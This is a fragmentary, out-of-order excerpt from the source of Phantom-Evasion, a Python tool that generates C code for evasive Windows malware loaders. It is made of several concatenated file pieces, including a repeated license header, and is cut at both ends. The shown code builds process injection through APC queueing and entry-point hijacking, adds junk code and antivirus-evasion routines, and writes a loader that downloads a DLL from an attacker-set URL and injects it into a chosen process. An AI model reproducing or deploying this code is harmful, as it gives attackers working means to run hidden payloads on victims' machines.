Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess," + Randlpv2 + ", (LPCVOID)" + ModOpt["Buff"] + "," + ModOpt["Bufflen"] + ", NULL);\n"
elif ModOpt["Decoder"] != "False" and ModOpt["MemAlloc"] in ["SS","SharedSection"]:
Ret_code += ModOpt["Decoder"]
if "RW/RX" in ModOpt["MemAlloc"] or "RW/RWX" in ModOpt["MemAlloc"]:
Ret_code += Win_ChangeMemProtect(ModOpt)
Ret_code += "QueueUserAPC((PAPCFUNC)" + Randlpv2 + "," + Randpi + ".hThread,(ULONG_PTR)NULL);\n"
Ret_code += "ResumeThread(" + Randpi + ".hThread);\n"
elif ModOpt["ExecMethod"] in ["EntryPointHijack","EPH"]:
Randsi = varname_creator()
Randpi = varname_creator()
NdcNTQIP = varname_creator()
Randpbi = varname_creator()
RandLen = varname_creator()
RandImgBase = varname_creator()
RandBuffHeader = varname_creator()
RandDosHeader = varname_creator()
RandNtHeader = varname_creator()
RandEntry = varname_creator()
if ModOpt["DynImport"] == False and "NtdllHandle" not in ModOpt :
ModOpt["NtdllHandle"] = varname_creator()
Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
ModOpt["ProcHandle"] = Randpi + ".hProcess"
if "PBIdefined" not in ModOpt or ModOpt["PBIdefined"] == False:
Ret_code += "typedef struct _PROCESS_BASIC_INFORMATION {"
Ret_code += "PVOID Reserved1;"
Ret_code += "SIZE_T PebBaseAddress;"
Ret_code += "PVOID Reserved2[2];"
Ret_code += "ULONG_PTR UniqueProcessId;"
Ret_code += "PVOID Reserved3;"
Ret_code += "} PROCESS_BASIC_INFORMATION;\n"
Ret_code += "STARTUPINFOA " + Randsi + ";\n"
Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
Ret_code += "PROCESS_BASIC_INFORMATION " + Randpbi + ";\n"
Ret_code += "DWORD " + RandLen + " = 0;\n"
Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(" + Randsi + "));\n"
Ret_code += Randsi + ".cb = sizeof(" + Randsi + ");\n"
Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(" + Randpi + "));\n"
Ret_code += "CreateProcessA(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"
Ret_code += "FARPROC " + NdcNTQIP + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ",\"NtQueryInformationProcess\");\n"
Ret_code += NdcNTQIP + "(" + Randpi + ".hProcess,0, &" + Randpbi + ", sizeof(PROCESS_BASIC_INFORMATION), &" + RandLen + ");\n"
Ret_code += "SIZE_T pebOffset = (SIZE_T)" + Randpbi + ".PebBaseAddress + 8;\n"
Ret_code += "LPVOID " + RandImgBase + " = 0;\n"
Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess, (LPCVOID)((SIZE_T)" + Randpbi + ".PebBaseAddress + 8), &" + RandImgBase + ", 4, NULL);\n"
#// read target process image headers
Ret_code += "BYTE " + RandBuffHeader + "[4096] = {};\n"
Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(LPCVOID)" + RandImgBase + "," + RandBuffHeader + ",4096,NULL);\n"
#// get AddressOfEntryPoint
Ret_code += "PIMAGE_DOS_HEADER " + RandDosHeader + " = (PIMAGE_DOS_HEADER)" + RandBuffHeader + ";\n"
Ret_code += "PIMAGE_NT_HEADERS " + RandNtHeader + " = (PIMAGE_NT_HEADERS)((LPBYTE)" + RandBuffHeader + " + " + RandDosHeader + "->e_lfanew);\n"
Ret_code += "LPVOID " + RandEntry + " = (LPVOID)(" + RandNtHeader + "->OptionalHeader.AddressOfEntryPoint + " + RandImgBase + ");\n"
#// write shellcode to image entry point and execute it
if ModOpt["Decoder"] != "False":
Ret_code += ModOpt["Decoder"]
Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess," + RandEntry + "," + ModOpt["Buff"] + ", sizeof(" + ModOpt["Buff"] + "), NULL);\n"
Ret_code += "ResumeThread(" + Randpi + ".hThread);\n"
return Ret_code
# Phantom-Evasion is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import random, string
import sys
sys.path.append("Modules/payloads/auxiliar")
import usefull
RandCounter = usefull.varname_creator()
RandAttr = usefull.varname_creator()
Junkcode1 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode2 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode3 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode4 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode5 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode6 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode7 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode8 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Junkcode9 = usefull.Junkmathinject(str(random.randint(1, 16))) # Junkcode
Win_eva1 = usefull.windows_evasion(str(random.randint(1, 17)))
Win_eva2 = usefull.windows_evasion(str(random.randint(1, 17)))
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import random, string
import sys
sys.path.append("Modules/payloads/auxiliar")
import usefull
Payload = sys.argv[1]
Filename = sys.argv[2]
Encryption = sys.argv[3]
Randbufname = usefull.varname_creator()
Payload = usefull.encoding_manager(Encryption, Payload, Randbufname)
Randmem = usefull.varname_creator()
NdcHeapcreate = usefull.varname_creator()
NdcHeapalloc = usefull.varname_creator()
Ker32 = usefull.varname_creator()
Randlpv = usefull.varname_creator()
Randhand = usefull.varname_creator()
def DownloadExecDll_C_windows(ModOpt):
UrlTarget = ModOpt["UrlTarget"]
Filesize = ModOpt["Filesize"]
RandvarFsize = varname_creator()
RandhProcess = varname_creator()
Randentry = varname_creator()
RandProcsnapshot = varname_creator()
Randlpv = varname_creator()
Randpointer = varname_creator()
RandhInternet = varname_creator()
RandhURL = varname_creator()
RandvarBRead = varname_creator()
RandvarBWritten = varname_creator()
RandisRead = varname_creator()
Randflag = varname_creator()
RandhThread = varname_creator()
Randlpv2 = varname_creator()
ModOpt["Lpvoid"] = Randlpv
CryptFile(ModOpt)
if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:
RandRvaParam = varname_creator()
RandBaseAddrParam = varname_creator()
RandFuncRva2Offset = varname_creator()
RandIndex = varname_creator()
RandSectHeader = varname_creator()
RandNtHeader = varname_creator()
RandBaseAddr = varname_creator()
RandExportDir = varname_creator()
RandArrName = varname_creator()
RandArrAddr = varname_creator()
RandOrdName = varname_creator()
RandLoaderOffset = varname_creator()
RandExportedFunc = varname_creator()
RandCounter = varname_creator()
elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:
RandLoadLib = varname_creator()
RandGetProcAddr = varname_creator()
RandPdllMain = varname_creator()
RandLoadStruct = varname_creator()
RandImgDosHeader = varname_creator()
RandImgNTHeader = varname_creator()
RandImgSectHeader = varname_creator()
RandhModule = varname_creator()
Randflag2 = varname_creator()
RandvarFunc = varname_creator()
RandvarList = varname_creator()
RandImgImport = varname_creator()
RandvarEntry = varname_creator()
RandvarDelta = varname_creator()
RandPtrLoader = varname_creator()
RandImgBaseReloc = varname_creator()
RandImgImportDesc = varname_creator()
RandFirstT = varname_creator()
RandOrigFirstT = varname_creator()
RandImgEntryTls = varname_creator()
RandTlsDir = varname_creator()
RandCallback = varname_creator()
RandLoaderMem = varname_creator()
Ret_code = ""
IncludeList = ["#include <stdlib.h>\n","#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <time.h>\n","#include <math.h>\n"]
Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"
Ret_code += "#include <wininet.h>\n"
if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:
Ret_code += "DWORD " + RandFuncRva2Offset + "( DWORD " + RandRvaParam + ", UINT_PTR " + RandBaseAddrParam + " ){\n"
Ret_code += "WORD " + RandIndex + " = 0;\n"
Ret_code += "PIMAGE_SECTION_HEADER " + RandSectHeader + " = NULL;\n"
Ret_code += "PIMAGE_NT_HEADERS " + RandNtHeader + " = NULL;\n"
Ret_code += RandNtHeader + " = (PIMAGE_NT_HEADERS)(" + RandBaseAddrParam + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddrParam + ")->e_lfanew);\n"
Ret_code += RandSectHeader + " = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&" + RandNtHeader + "->OptionalHeader) + " + RandNtHeader + "->FileHeader.SizeOfOptionalHeader);\n"
Ret_code += "if( " + RandRvaParam + " < " + RandSectHeader + "[0].PointerToRawData )\n"
Ret_code += "return " + RandRvaParam + ";\n"
Ret_code += "for( " + RandIndex + "=0 ; " + RandIndex + " < " + RandNtHeader + "->FileHeader.NumberOfSections ; " + RandIndex + "++ ){\n"
Ret_code += "if( " + RandRvaParam + " >= " + RandSectHeader + "[" + RandIndex + "].VirtualAddress && " + RandRvaParam + " < (" + RandSectHeader + "[" + RandIndex + "].VirtualAddress + " + RandSectHeader + "[" + RandIndex + "].SizeOfRawData) )\n"
Ret_code += "return ( " + RandRvaParam + " - " + RandSectHeader + "[" + RandIndex + "].VirtualAddress + " + RandSectHeader + "[" + RandIndex + "].PointerToRawData );}\n"
Ret_code += "return 0;}\n"
elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:
Ret_code += "typedef HMODULE (WINAPI * " + RandLoadLib + ")(LPCSTR);\n"
Ret_code += "typedef FARPROC (WINAPI * " + RandGetProcAddr+ ")(HMODULE,LPCSTR);\n"
Ret_code += "typedef BOOL (WINAPI * " + RandPdllMain + ")(HMODULE,DWORD,LPVOID);\n"
#Ret_code += "typedef BOOL (NTAPI *pRtlAddFunctionTable)(PRUNTIME_FUNCTION,DWORD,DWORD64);\n"
Ret_code += "typedef struct _" + RandLoadStruct + "{"
Ret_code += "LPVOID ImageBase;"
Ret_code += "PIMAGE_NT_HEADERS NtHeaders;"
Ret_code += "PIMAGE_BASE_RELOCATION BaseRelocation;"
Ret_code += "PIMAGE_IMPORT_DESCRIPTOR ImportDirectory;"
Ret_code += RandLoadLib + " fnLoadLibraryA;"
Ret_code += RandGetProcAddr+ " fnGetProcAddress;"
#Ret_code += "pRtlAddFunctionTable fnRtlAddFunctionTable;\n"
Ret_code += "}" + RandLoadStruct + ",*P" + RandLoadStruct + ";\n"
Ret_code += "static SIZE_T WINAPI LoadDll(LPVOID p){\n"
Ret_code += "P" + RandLoadStruct + " " + RandPtrLoader+ " = (P" + RandLoadStruct + ")p;\n"
Ret_code += "HMODULE " + RandhModule + ";\n"
Ret_code += "DWORD " + Randflag2 + "," + Randflag + ";\n"
Ret_code += "DWORD " + RandvarFunc + ";\n"
Ret_code += "PWORD " + RandvarList + ";\n"
Ret_code += "PIMAGE_IMPORT_BY_NAME " + RandImgImport + ";\n"
Ret_code += RandPdllMain + " " + RandvarEntry+ ";\n"
Ret_code += "SIZE_T " + RandvarDelta+ ";\n"
Ret_code += RandvarDelta+ "=(SIZE_T)((LPBYTE)" + RandPtrLoader+ "->ImageBase-" + RandPtrLoader+ "->NtHeaders->OptionalHeader.ImageBase);\n"
Ret_code += "if(" + RandvarDelta+ " != 0){\n"
Ret_code += "PIMAGE_BASE_RELOCATION " + RandImgBaseReloc+ " = " + RandPtrLoader+ "->BaseRelocation;\n"
Ret_code += "while(" + RandImgBaseReloc+ "->VirtualAddress){\n"
Ret_code += "if(" + RandImgBaseReloc+ "->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION)){\n"
Ret_code += Randflag + "=(" + RandImgBaseReloc+ "->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);\n"
Ret_code += RandvarList + "=(PWORD)(" + RandImgBaseReloc+ "+1);\n"
Ret_code += "for(" + Randflag2 + "=0;" + Randflag2 + "<" + Randflag + ";" + Randflag2 + "++){\n"
Ret_code += "if(" + RandvarList + "[" + Randflag2 + "]){\n"
Ret_code += "PDWORD ptr=(PDWORD)((LPBYTE)" + RandPtrLoader+ "->ImageBase+(" + RandImgBaseReloc+ "->VirtualAddress+(" + RandvarList + "[" + Randflag2 + "] & 0xFFF)));\n"
Ret_code += "*ptr+=" + RandvarDelta+ ";}}}\n"
Ret_code += RandImgBaseReloc+ "=(PIMAGE_BASE_RELOCATION)((LPBYTE)" + RandImgBaseReloc+ "+" + RandImgBaseReloc+ "->SizeOfBlock);}}\n"
Ret_code += "PIMAGE_IMPORT_DESCRIPTOR " + RandImgImportDesc+ " = " + RandPtrLoader+ "->ImportDirectory;\n"
Ret_code += "PIMAGE_THUNK_DATA " + RandFirstT+ "," + RandOrigFirstT+ ";\n"
Ret_code += "while(" + RandImgImportDesc+ "->Characteristics){\n"
Ret_code += RandOrigFirstT + "=(PIMAGE_THUNK_DATA)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "->OriginalFirstThunk);\n"
Ret_code += RandFirstT+ "=(PIMAGE_THUNK_DATA)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "-> FirstThunk);\n"
Ret_code += RandhModule + "=" + RandPtrLoader+ "->fnLoadLibraryA((LPCSTR)" + RandPtrLoader+ "->ImageBase+" + RandImgImportDesc+ "->Name);\n"
Ret_code += "while(" + RandOrigFirstT+ "->u1.AddressOfData){\n"
Ret_code += "if(" + RandOrigFirstT+ "->u1.Ordinal & IMAGE_ORDINAL_FLAG){\n"
Ret_code += RandvarFunc + "=(DWORD)" + RandPtrLoader+ "->fnGetProcAddress(" + RandhModule + ",(LPCSTR)(" + RandOrigFirstT+ "->u1.Ordinal & 0xFFFF)); \n"
Ret_code += RandFirstT+ "->u1.Function=" + RandvarFunc + ";}\n"
Ret_code += "else{\n"
Ret_code += RandImgImport + "=(PIMAGE_IMPORT_BY_NAME)((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandOrigFirstT+ "->u1.AddressOfData);\n"
Ret_code += RandvarFunc + "=(DWORD)" + RandPtrLoader+ "->fnGetProcAddress(" + RandhModule + ",(LPCSTR)" + RandImgImport + "->Name);\n"
Ret_code += RandFirstT+ "->u1.Function=" + RandvarFunc + ";}\n"
Ret_code += RandOrigFirstT+ "++;\n"
Ret_code += RandFirstT+ "++;}" + RandImgImportDesc+ "++;}\n"
#Ret_code += "IMAGE_DATA_DIRECTORY " + RandImgEntryTls+ " = " + RandPtrLoader+ "->NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];\n"
#Ret_code += "if(" + RandImgEntryTls+ ".VirtualAddress != 0){\n"
#Ret_code += "PIMAGE_TLS_DIRECTORY " + RandTlsDir+ " = (PIMAGE_TLS_DIRECTORY)((LPBYTE)" + RandPtrLoader+ "->ImageBase + " + RandImgEntryTls+ ".VirtualAddress);\n"
#Ret_code += "PIMAGE_TLS_CALLBACK *" + RandCallback+ " = (PIMAGE_TLS_CALLBACK *)" + RandTlsDir+ "->AddressOfCallBacks;\n"
#Ret_code += "if(" + RandCallback+ "){\n"
#Ret_code += "while (*" + RandCallback+ "){\n"
#Ret_code += "(*" + RandCallback+ ")((HMODULE)" + RandPtrLoader + "->ImageBase, DLL_PROCESS_ATTACH, NULL);\n"
#Ret_code += RandCallback+ "++;}}}\n"
Ret_code += "if(" + RandPtrLoader+ "->NtHeaders->OptionalHeader.AddressOfEntryPoint){\n"
Ret_code += RandvarEntry+ "=( " + RandPdllMain + ")((LPBYTE)" + RandPtrLoader+ "->ImageBase+" + RandPtrLoader+ "->NtHeaders->OptionalHeader.AddressOfEntryPoint);\n"
Ret_code += "return " + RandvarEntry+ "((HMODULE)(" + RandPtrLoader+ "->ImageBase),DLL_PROCESS_ATTACH,NULL);}\n"
Ret_code += "return TRUE;}\n"
Ret_code += "static SIZE_T WINAPI LoadDllEnd(){return 0;}\n"
#Ret_code += "#define CountRelocationEntries(dwBlockSize) (dwBlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY)\n"
if ModOpt["Outformat"] == "exe":
Ret_code += "int main(int argc,char * argv[]){\n"
elif ModOpt["Outformat"] == "dll":
Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
Ret_code += "BOOL bReturnValue = TRUE;\n"
Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n"
Ret_code += "$:START\n"
Ret_code += WindowsDefend(ModOpt)
#Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])
Ret_code += "$:EVA\n"
Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
Wininet = varname_creator()
NdcTl32Snapshot = varname_creator()
NdcProcess32First = varname_creator()
NdcProcess32Next = varname_creator()
NdcOpenProcess = varname_creator()
Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"
Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + Wininet + ", \"CreateToolhelp32Snapshot\");\n"
Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + Wininet + ", \"Process32First\");\n"
Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + Wininet + ", \"Process32Next\");\n"
Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
Ret_code += "if(" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "while(" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "if(strcmp(" + Randentry + ".szExeFile,\"" + ModOpt["ProcTarget"] + "\") == 0){\n"
Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + Wininet + ", \"OpenProcess\");\n"
Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"
else:
Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "if(strcmp(" + Randentry + ".szExeFile,\"" + ModOpt["ProcTarget"] + "\") == 0){\n"
Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE," + Randentry + ".th32ProcessID);\n"
Ret_code += "int " + RandvarFsize + " = " + ModOpt["Filesize"] + ";\n"
Ret_code += "DWORD " + RandvarBWritten + " = 0;\n"
if ModOpt["DynImport"] == True:
NdcInternetOpenA = varname_creator()
NdcInternetOpenUrl = varname_creator()
NdcVirtualAlloc = varname_creator()
NdcInternetReadFile = varname_creator()
Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
Ret_code += "if(" + RandhInternet + " != NULL){\n"
Ret_code += "FARPROC " + NdcInternetOpenUrl + " = GetProcAddress(" + Wininet + ", \"InternetOpenUrl\");\n"
Ret_code += "HINTERNET " + RandhURL + " = (HINTERNET)" + NdcInternetOpenUrl + "(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE | INTERNET_FLAG_NO_CACHE_WRITE, 0);\n"
Ret_code += "FARPROC " + NdcVirtualAlloc + " = GetProcAddress(" + Wininet + ", \"VirtualAlloc\");\n"
Ret_code += "unsigned char * " + Randlpv + " = (LPVOID)" + NdcVirtualAlloc + "(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
Ret_code += "DWORD " + RandvarBRead + ";\n"
Ret_code += "do{\n"
Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
else:
Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
Ret_code += "if(" + RandhInternet + " != NULL){\n"
Ret_code += "HINTERNET " + RandhURL + " = InternetOpenUrl(" + RandhInternet + ",\"" + ModOpt["UrlTarget"] + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE | INTERNET_FLAG_NO_CACHE_WRITE, 0);\n"
Ret_code += "unsigned char * " + Randlpv + " = VirtualAlloc(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
Ret_code += "DWORD " + RandvarBRead + ";\n"
Ret_code += "do{\n"
Ret_code += "BOOL RandisRead = InternetReadFile(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
Ret_code += Randpointer + " += " + RandvarBRead + ";\n"
Ret_code += "}while(" + RandvarBRead + " > 0);\n"
if ModOpt["Decoder"] != "False":
Ret_code += ModOpt["Decoder"]
if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:
Ret_code += "UINT_PTR " + RandBaseAddr + " = (UINT_PTR)" + Randlpv + ";\n"
Ret_code += "UINT_PTR " + RandExportDir + " = " + RandBaseAddr + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddr + ")->e_lfanew;\n"
Ret_code += "UINT_PTR " + RandArrName + " = (UINT_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir + ")->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];\n"
Ret_code += RandExportDir + " = " + RandBaseAddr + " + " + RandFuncRva2Offset + "(((PIMAGE_DATA_DIRECTORY)" + RandArrName + ")->VirtualAddress, " + RandBaseAddr + " );\n"
Ret_code += RandArrName + " = " + RandBaseAddr + " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfNames, " + RandBaseAddr + " );\n"
Ret_code += "UINT_PTR " + RandArrAddr + " = " + RandBaseAddr + " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfFunctions, " + RandBaseAddr + " );\n"
Ret_code += "UINT_PTR " + RandOrdName + " = " + RandBaseAddr + " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfNameOrdinals, " + RandBaseAddr + " );\n"
Ret_code += "DWORD " + RandCounter + " = ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->NumberOfNames;\n"
Ret_code += "DWORD " + RandLoaderOffset + ";\n"
Ret_code += "while( " + RandCounter + "-- ){\n"
Ret_code += "char * " + RandExportedFunc + " = (char *)(" + RandBaseAddr + " + " + RandFuncRva2Offset + "(*(DWORD *)(" + RandArrName + ")," + RandBaseAddr + "));\n"
Ret_code += "if(strstr( " + RandExportedFunc + ", \"ReflectiveLoader\" ) != NULL){\n"
Ret_code += RandArrAddr + " = " + RandBaseAddr + " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfFunctions, " + RandBaseAddr + " );\n"
Ret_code += RandArrAddr + " += (*(WORD *)(" + RandOrdName + ")*sizeof(DWORD));\n"
Ret_code += RandLoaderOffset + " = " + RandFuncRva2Offset + "(*(DWORD *)(" + RandArrAddr + ")," + RandBaseAddr + ");}\n"
Ret_code += RandArrName + " += sizeof(DWORD);\n"
Ret_code += RandOrdName + " += sizeof(WORD);}\n"
if ModOpt["DynImport"] == True:
NdcVirtualAllocEx = varname_creator()
NdcWriteProcessMemory = varname_creator()
Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"WriteProcessMemory\");\n"
Ret_code += "LPVOID " + Randlpv2 + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",NULL," + RandvarFsize + ",MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);\n"
Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandvarFsize + ",NULL);\n"
else:
Ret_code += "LPVOID " + Randlpv2 + " = VirtualAllocEx(" + RandhProcess + ",NULL," + RandvarFsize + ",MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "WriteProcessMemory(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandvarFsize + ",NULL);\n"
if "APC" in ModOpt["ExecMethod"]:
RandThreadsnapshot = varname_creator()
RandTargetThread = varname_creator()
RandTentry = varname_creator()
RandAPC = varname_creator()
Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n"
Ret_code += "THREADENTRY32 " + RandTentry + ";\n"
Ret_code += RandTentry + ".dwSize = sizeof(THREADENTRY32);\n"
Ret_code += "PTHREAD_START_ROUTINE " + RandAPC + " = (PTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 + "+" + RandLoaderOffset + ");\n"
if ModOpt["DynImport"] == True:
User32 = varname_creator()
NdcThread32First = varname_creator()
NdcThread32Next = varname_creator()
NdcOpenThread = varname_creator()
NdcQueueAPC = varname_creator()
Ret_code += "HANDLE " + User32 + " = GetModuleHandle(\"user32.dll\");\n"
Ret_code += "FARPROC " + NdcThread32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32First\");\n"
Ret_code += "FARPROC " + NdcThread32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32Next\");\n"
Ret_code += "FARPROC " + NdcOpenThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenThread\");\n"
Ret_code += "FARPROC " + NdcQueueAPC + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"QueueUserAPC\");\n"
Ret_code += RandThreadsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPTHREAD,0);\n"
Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
Ret_code += "if(!" + NdcThread32First + "(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot + ");}\n"
Ret_code += "do{\n"
Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
Ret_code += "HANDLE " + RandTargetThread + " = (HANDLE)" + NdcOpenThread + "(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
Ret_code += "if(" + RandTargetThread + " != NULL){\n"
Ret_code += NdcQueueAPC + "((PAPCFUNC)" + RandAPC + "," + RandTargetThread + ",(ULONG_PTR)NULL);}}\n"
Ret_code += "}while(" + NdcThread32Next + "(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"
else:
Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);\n"
Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot +");}\n"
Ret_code += "do{\n"
Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
Ret_code += "if(" + RandTargetThread + " != NULL){\n"
Ret_code += "QueueUserAPC((PAPCFUNC)" + RandAPC + "," + RandTargetThread + ",(ULONG_PTR)NULL);}}\n"
Ret_code += "}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"
elif "TC" in ModOpt["ExecMethod"]:
RandThreadsnapshot = varname_creator()
RandTargetThread = varname_creator()
RandTentry = varname_creator()
RandContext = varname_creator()
RandRemCtx = varname_creator()
RandRemStack = varname_creator()
Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n"
Ret_code += "THREADENTRY32 " + RandTentry + ";\n"
if ModOpt["DynImport"] == True:
NdcThread32First = varname_creator()
